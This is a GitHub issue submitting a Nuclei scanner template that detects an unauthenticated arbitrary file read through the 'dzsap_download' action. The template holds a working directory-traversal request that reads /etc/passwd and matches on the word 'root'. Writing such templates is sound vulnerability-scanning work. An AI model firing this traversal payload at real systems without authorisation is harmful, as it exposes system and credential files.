### ISSUE TITLE
[nuclei-template] 

### ISSUE THREAD

**Issue by Chakraborty-Arpan** [projectdiscovery/nuclei-templates#3851]
### Nuclei Template:

id: arbitrary-file-read
info: 
  author: hackerarpan
  description: "due to input validation error when processing directory traversal sequences in the \"link\" parameter in the \"dzsap_download\" action."
  name: "Unauthenticated arbitrary-file-read"
  reference: 
    - "https://www.exploit-db.com/exploits/50564"
  severity: medium
  tags: arbitrary-file-read

```yaml
requests: 
  - 
    matchers: 
      - 
        part: body
        type: word
        words: 
          - root
      - 
        status: 
          - 200
        type: status
    matchers-condition: and
    method: GET
    path: 
      - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
```
